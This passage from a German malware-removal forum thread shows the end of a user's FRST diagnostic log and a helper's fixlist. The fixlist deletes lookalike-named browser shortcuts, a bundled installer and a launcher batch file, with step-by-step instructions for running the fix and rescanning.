2017-02-06 11:43 - 2017-02-06 11:44 - 00073728 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.11.105.0_x64__kzf8qxf38zg5c\SkypeHost.exe
2017-02-06 11:43 - 2017-02-06 11:44 - 00179712 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.11.105.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2017-02-06 11:43 - 2017-02-06 11:44 - 42895872 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.11.105.0_x64__kzf8qxf38zg5c\SkyWrap.dll
2017-02-06 11:43 - 2017-02-06 11:44 - 02215424 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.11.105.0_x64__kzf8qxf38zg5c\roottools.dll
2016-09-23 02:40 - 2017-02-13 21:24 - 00028672 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\PEbiosinterface32.dll
2016-09-23 02:40 - 2013-07-04 02:32 - 00104448 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\ATKEX.dll
2016-10-22 12:18 - 2016-10-22 12:18 - 02493440 _____ () C:\Program Files (x86)\Origin\libGLESv2.dll
2016-10-13 07:34 - 2017-01-20 19:39 - 00018880 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll
2016-10-13 07:34 - 2017-01-20 19:39 - 03774400 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\Poco.dll
2016-10-13 07:34 - 2017-01-20 19:39 - 00900032 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\libprotobuf.dll
2016-10-13 07:34 - 2017-01-20 19:38 - 64245184 _____ () C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\libcef.dll
2016-10-13 07:34 - 2017-01-20 14:36 - 00338488 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVAccountAPINode.node
2016-10-13 07:34 - 2017-01-20 14:36 - 00254008 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\DriverInstall.node
2016-10-13 07:34 - 2017-01-20 14:36 - 02808888 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\Downloader.node
2016-10-13 07:34 - 2017-01-20 14:36 - 00384568 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvGameShareAPINode.node
2016-10-13 07:34 - 2017-01-20 14:36 - 00537656 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvSpCapsAPINode.node
2016-10-13 07:34 - 2017-01-20 14:36 - 00468024 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvGalleryAPINode.node
2016-10-13 07:34 - 2017-01-20 14:36 - 01066552 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvCameraAPINode.node
2017-02-03 17:12 - 2017-01-20 14:36 - 01014840 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvSDKAPINode.node

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)


==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)


==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)


==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2009-07-14 03:34 - 2017-02-12 22:14 - 00000833 ____A C:\WINDOWS\system32\Drivers\etc\hosts


==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-1500252791-3377746768-789393517-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Barbara\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper
DNS Servers: 192.168.2.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\StartupApproved\Run: => "Spotify"
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\StartupApproved\Run: => "Steam"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [vm-monitoring-nb-session] => LPort=139
FirewallRules: [MSMQ-In-TCP] => %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-TCP] => %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-UDP] => %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-UDP] => %systemroot%\system32\mqsvc.exe
FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => LPort=808
FirewallRules: [UDP Query User{89490B79-F7C4-449C-AEA9-7C67ECB9FB5B}D:\program files (x86)\the witcher 2\bin\witcher2.exe] => D:\program files (x86)\the witcher 2\bin\witcher2.exe
FirewallRules: [TCP Query User{4A234969-EDBC-4530-B847-6329B46AA77A}D:\program files (x86)\the witcher 2\bin\witcher2.exe] => D:\program files (x86)\the witcher 2\bin\witcher2.exe
FirewallRules: [UDP Query User{F111BCF2-9CBB-4742-9CFC-D23879181430}D:\program files (x86)\the witcher 2\bin\witcher2.exe] => D:\program files (x86)\the witcher 2\bin\witcher2.exe
FirewallRules: [TCP Query User{3DC38285-63C7-451A-AE42-5DB7E25FE3FB}D:\program files (x86)\the witcher 2\bin\witcher2.exe] => D:\program files (x86)\the witcher 2\bin\witcher2.exe
FirewallRules: [{C681929D-CAC5-43C1-8926-0E72B114FE4B}] => C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{51B20E6F-4269-4C1F-BCCF-4AE409514E34}] => C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{1EFF0FAC-0E9E-4E91-809B-2BBDDEF8994B}] => C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{51F45EC0-BB2A-4881-81A4-39592A9F1F50}] => C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [UDP Query User{592ABD94-223B-4029-ADAD-C4B4FCB9D173}C:\users\barbara\appdata\roaming\spotify\spotify.exe] => C:\users\barbara\appdata\roaming\spotify\spotify.exe
FirewallRules: [TCP Query User{E1123DD8-DF30-4BAF-95D0-0CD324E434C5}C:\users\barbara\appdata\roaming\spotify\spotify.exe] => C:\users\barbara\appdata\roaming\spotify\spotify.exe
FirewallRules: [{E755C63D-D036-4730-806E-F025F68F5F83}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{EA936888-D98A-4A6D-8DD0-3AD3C9E0A3BE}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{B23562F6-99F7-40EB-85CA-F7BC0A871F26}C:\users\barbara\appdata\roaming\spotify\spotify.exe] => C:\users\barbara\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{B9E938BA-EF39-4E7E-85AB-3E80B71AFF38}C:\users\barbara\appdata\roaming\spotify\spotify.exe] => C:\users\barbara\appdata\roaming\spotify\spotify.exe
FirewallRules: [{DC1A5F54-BD72-48BE-9E47-2743168046A0}] => C:\Program Files\NVIDIA Corporation\NvContainer\NvContainer.exe
FirewallRules: [{552C0333-744D-467D-9BBA-8B77D85239E4}] => C:\Program Files\NVIDIA Corporation\NvContainer\NvContainer.exe
FirewallRules: [{D8E7A1C6-22AF-42A9-8E8C-58F55E9CE22C}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{E0D9EE58-C0E4-48F0-BDC9-947A2AB5CA23}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{4ED0602B-CF04-4814-BAC6-89B59E81BAAC}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
DomainProfile\AuthorizedApplications: [C:\Program Files\ARCHline 2015\\ARCHlineXP2015.exe] => C:\Program Files\ARCHline 2015\ARCHlineXP2015.exe:*:Enabled:ARCHline.XP 2015
DomainProfile\AuthorizedApplications: [C:\Program Files\ARCHline 2015\\ARCHlineXP2015.bin] => C:\Program Files\ARCHline 2015\ARCHlineXP2015.bin:*:Enabled:ARCHline.XP 2015
StandardProfile\AuthorizedApplications: [C:\Program Files\ARCHline 2015\\ARCHlineXP2015.exe] => C:\Program Files\ARCHline 2015\ARCHlineXP2015.exe:*:Enabled:ARCHline.XP 2015
StandardProfile\AuthorizedApplications: [C:\Program Files\ARCHline 2015\\ARCHlineXP2015.bin] => C:\Program Files\ARCHline 2015\ARCHlineXP2015.bin:*:Enabled:ARCHline.XP 2015

==================== Wiederherstellungspunkte =========================

25-01-2017 13:43:30 Windows Update
03-02-2017 17:33:02 Geplanter Prüfpunkt
09-02-2017 13:37:47 Windows Update
13-02-2017 20:00:44 Revo Uninstaller's restore point - AppTrailers - AppTrailers for Desktop
13-02-2017 20:01:09 Revo Uninstaller's restore point - AppTrailers - AppTrailers for Desktop
13-02-2017 20:01:36 Revo Uninstaller's restore point - BeCleaner version 1.0
13-02-2017 20:01:57 Revo Uninstaller's restore point - HDWallPaper 1.0
13-02-2017 20:02:41 Revo Uninstaller's restore point - MyMemory
13-02-2017 20:03:19 Revo Uninstaller's restore point - MyMemory
13-02-2017 20:03:37 Revo Uninstaller's restore point - OtherSearch
13-02-2017 20:03:56 Revo Uninstaller's restore point - pccleanplus
13-02-2017 20:04:22 Revo Uninstaller's restore point - Search module
13-02-2017 20:04:57 Revo Uninstaller's restore point - Social2Search
13-02-2017 20:05:16 Revo Uninstaller's restore point - Social2Search
13-02-2017 20:06:10 Revo Uninstaller's restore point - youndoo - Uninstall
13-02-2017 20:06:27 Revo Uninstaller's restore point - trotux - Uninstall
13-02-2017 20:08:26 Revo Uninstaller's restore point - Malwarebytes Anti-Malware Version 2.2.1.1043
13-02-2017 20:09:06 Revo Uninstaller's restore point - youndoo - Uninstall
13-02-2017 20:09:29 Revo Uninstaller's restore point - BrowserAir
13-02-2017 20:11:04 Revo Uninstaller's restore point - Search module
13-02-2017 20:11:46 Revo Uninstaller's restore point - MyMemory
13-02-2017 21:45:20 Revo Uninstaller's restore point - WinSnare
13-02-2017 21:45:34 Removed WinSnare

==================== Fehlerhafte Geräte im Gerätemanager =============


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (02/13/2017 10:27:49 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Fehler beim Generieren des Aktivierungskontexts für "C:\Program Files (x86)\ESET\ESET Online Scanner\ESETSmartInstaller.exe". Fehler in Manifest- oder Richtliniendatei "" in Zeile .
Eine für die Anwendung erforderliche Komponentenversion steht in Konflikt mit einer anderen, bereits aktiven Komponentenversion.
In Konflikt stehende Komponenten:.
Komponente 1: C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.447_none_42191651c6827bb3.manifest.
Komponente 2: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.447_none_89c64d28dafea4b9.manifest.

Error: (02/13/2017 10:27:40 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Fehler beim Generieren des Aktivierungskontexts für "C:\Program Files (x86)\ESET\ESET Online Scanner\ESETSmartInstaller.exe". Fehler in Manifest- oder Richtliniendatei "" in Zeile .
Eine für die Anwendung erforderliche Komponentenversion steht in Konflikt mit einer anderen, bereits aktiven Komponentenversion.
In Konflikt stehende Komponenten:.
Komponente 1: C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.447_none_42191651c6827bb3.manifest.
Komponente 2: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.447_none_89c64d28dafea4b9.manifest.

Error: (02/13/2017 10:27:30 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Fehler beim Generieren des Aktivierungskontexts für "c:\program files (x86)\eset\eset online scanner\ESETSmartInstaller.exe". Fehler in Manifest- oder Richtliniendatei "" in Zeile .
Eine für die Anwendung erforderliche Komponentenversion steht in Konflikt mit einer anderen, bereits aktiven Komponentenversion.
In Konflikt stehende Komponenten:.
Komponente 1: C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.447_none_42191651c6827bb3.manifest.
Komponente 2: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.447_none_89c64d28dafea4b9.manifest.

Error: (02/13/2017 09:47:53 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Fehler beim Generieren des Aktivierungskontexts für "C:\Program Files (x86)\ESET\ESET Online Scanner\ESETSmartInstaller.exe". Fehler in Manifest- oder Richtliniendatei "" in Zeile .
Eine für die Anwendung erforderliche Komponentenversion steht in Konflikt mit einer anderen, bereits aktiven Komponentenversion.
In Konflikt stehende Komponenten:.
Komponente 1: C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.447_none_42191651c6827bb3.manifest.
Komponente 2: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.447_none_89c64d28dafea4b9.manifest.

Error: (02/13/2017 09:47:41 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Fehler beim Generieren des Aktivierungskontexts für "C:\Program Files (x86)\ESET\ESET Online Scanner\ESETSmartInstaller.exe". Fehler in Manifest- oder Richtliniendatei "" in Zeile .
Eine für die Anwendung erforderliche Komponentenversion steht in Konflikt mit einer anderen, bereits aktiven Komponentenversion.
In Konflikt stehende Komponenten:.
Komponente 1: C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.447_none_42191651c6827bb3.manifest.
Komponente 2: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.447_none_89c64d28dafea4b9.manifest.

Error: (02/13/2017 09:47:01 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Fehler beim Generieren des Aktivierungskontexts für "c:\users\barbara\appdata\local\microsoft\windows\inetcache\ie\8rfodisj\esetsmartinstaller_deu.exe". Fehler in Manifest- oder Richtliniendatei "" in Zeile .
Eine für die Anwendung erforderliche Komponentenversion steht in Konflikt mit einer anderen, bereits aktiven Komponentenversion.
In Konflikt stehende Komponenten:.
Komponente 1: C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.447_none_42191651c6827bb3.manifest.
Komponente 2: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.447_none_89c64d28dafea4b9.manifest.

Error: (02/13/2017 09:46:58 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Fehler beim Generieren des Aktivierungskontexts für "C:\Users\Barbara\AppData\Local\Microsoft\Windows\INetCache\IE\8RFODISJ\esetsmartinstaller_deu.exe". Fehler in Manifest- oder Richtliniendatei "" in Zeile .
Eine für die Anwendung erforderliche Komponentenversion steht in Konflikt mit einer anderen, bereits aktiven Komponentenversion.
In Konflikt stehende Komponenten:.
Komponente 1: C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.447_none_42191651c6827bb3.manifest.
Komponente 2: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.447_none_89c64d28dafea4b9.manifest.

Error: (02/13/2017 09:46:54 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Fehler beim Generieren des Aktivierungskontexts für "C:\Users\Barbara\AppData\Local\Microsoft\Windows\INetCache\IE\8RFODISJ\esetsmartinstaller_deu.exe". Fehler in Manifest- oder Richtliniendatei "" in Zeile .
Eine für die Anwendung erforderliche Komponentenversion steht in Konflikt mit einer anderen, bereits aktiven Komponentenversion.
In Konflikt stehende Komponenten:.
Komponente 1: C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.447_none_42191651c6827bb3.manifest.
Komponente 2: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.447_none_89c64d28dafea4b9.manifest.

Error: (02/13/2017 09:45:35 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Fehler beim Kryptografiedienst während der Verarbeitung des "OnIdentity()"-Aufrufobjekts "System Writer".

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft-Verbindungsschichterkennungsprotokoll.

System Error:
Zugriff verweigert
.

Error: (02/13/2017 09:45:21 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Fehler beim Kryptografiedienst während der Verarbeitung des "OnIdentity()"-Aufrufobjekts "System Writer".

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft-Verbindungsschichterkennungsprotokoll.

System Error:
Zugriff verweigert
.


Systemfehler:
=============
Error: (02/13/2017 09:51:47 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "eapihdrv" wurde aufgrund folgenden Fehlers nicht gestartet: 
Der Treiber konnte nicht geladen werden.

Error: (02/13/2017 09:51:47 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\Barbara\AppData\Local\Temp\ehdrv.sys

Error: (02/13/2017 09:51:46 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "eapihdrv" wurde aufgrund folgenden Fehlers nicht gestartet: 
Der Treiber konnte nicht geladen werden.

Error: (02/13/2017 09:51:46 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\Barbara\AppData\Local\Temp\ehdrv.sys

Error: (02/13/2017 09:51:46 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "eapihdrv" wurde aufgrund folgenden Fehlers nicht gestartet: 
Der Treiber konnte nicht geladen werden.

Error: (02/13/2017 09:51:46 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\Barbara\AppData\Local\Temp\ehdrv.sys

Error: (02/13/2017 09:49:14 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "eapihdrv" wurde aufgrund folgenden Fehlers nicht gestartet: 
Der Treiber konnte nicht geladen werden.

Error: (02/13/2017 09:49:14 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\Barbara\AppData\Local\Temp\ehdrv.sys

Error: (02/13/2017 09:49:13 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "eapihdrv" wurde aufgrund folgenden Fehlers nicht gestartet: 
Der Treiber konnte nicht geladen werden.

Error: (02/13/2017 09:49:13 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\Barbara\AppData\Local\Temp\ehdrv.sys


CodeIntegrity:
===================================
  Date: 2017-02-13 20:42:44.656
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Program Files\Malwarebytes\Anti-Malware\mbae64.dll that did not meet the Store signing level requirements.

  Date: 2017-02-13 20:42:44.656
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Program Files\Malwarebytes\Anti-Malware\mbae64.dll that did not meet the Store signing level requirements.

  Date: 2017-02-13 20:40:18.579
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-02-13 19:15:20.412
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-02-13 19:15:17.050
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-02-13 19:15:11.930
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-02-12 22:25:39.778
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-02-05 16:37:00.860
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-02-05 16:30:05.983
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-02-05 16:29:50.519
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.


==================== Speicherinformationen =========================== 

Prozessor: Intel(R) Xeon(R) CPU E3-1231 v3 @ 3.40GHz
Prozentuale Nutzung des RAM: 17%
Installierter physikalischer RAM: 16328.44 MB
Verfügbarer physikalischer RAM: 13473.99 MB
Summe virtueller Speicher: 32712.44 MB
Verfügbarer virtueller Speicher: 29686.1 MB

==================== Laufwerke ================================

Drive c: () (Fixed) (Total:232.35 GB) (Free:163.01 GB) NTFS
Drive d: (Daten) (Fixed) (Total:1862.89 GB) (Free:1789.88 GB) NTFS
Drive e: (Disc2) (CDROM) (Total:7.88 GB) (Free:0 GB) UDF

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 232.9 GB) (Disk ID: 6CF6904B)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=232.3 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=450 MB) - (Type=27)

========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 1863 GB) (Disk ID: 00000000)

Partition: GPT.

==================== Ende von Addition.txt ============================

burningice · 14.02.2017, 16:51

Schritt: 1
Drücke bitte die Windowstaste + R Taste und schreibe notepad in das Ausführen Fenster.

Kopiere nun folgenden Text aus der Code-Box in das leere Textdokument

Code:

ATTFilter

Shortcut: C:\Users\Barbara\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Intеrnеt Ехplоrеr.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.bat (Keine Datei)
Shortcut: C:\Users\Barbara\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Lаunсh Intеrnеt Ехplоrеr Вrоwsеr.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.bat (Keine Datei)
Shortcut: C:\Users\Barbara\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Моzillа Firеfох.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.bat (Keine Datei)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Моzillа Firеfох.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.bat (Keine Datei)

D:\Downloads\ccsetup510_CB-DL-Manager.exe

D:\Program Files (x86)\The Witcher 2\Launcher.bat

emptytemp:

Speichere diese bitte als Fixlist.txt auf deinem Desktop (oder dem Verzeichnis in dem sich FRST befindet).

Starte nun FRST erneut und klicke den Entfernen Button.
Das Tool erstellt eine Fixlog.txt.
Poste mir deren Inhalt.

Wichtig: speichere diese Fixlist im UTF-8 Format ab, da sie unsichtbare Sonderzeichen enthält und sonst der Fix fehlschlagen würde.

Schritt: 2
Bitte starte wieder FRST, setze den Haken bei Addition und drücke auf Untersuchen. Poste bitte wieder die beiden Textdateien, die so entstehen.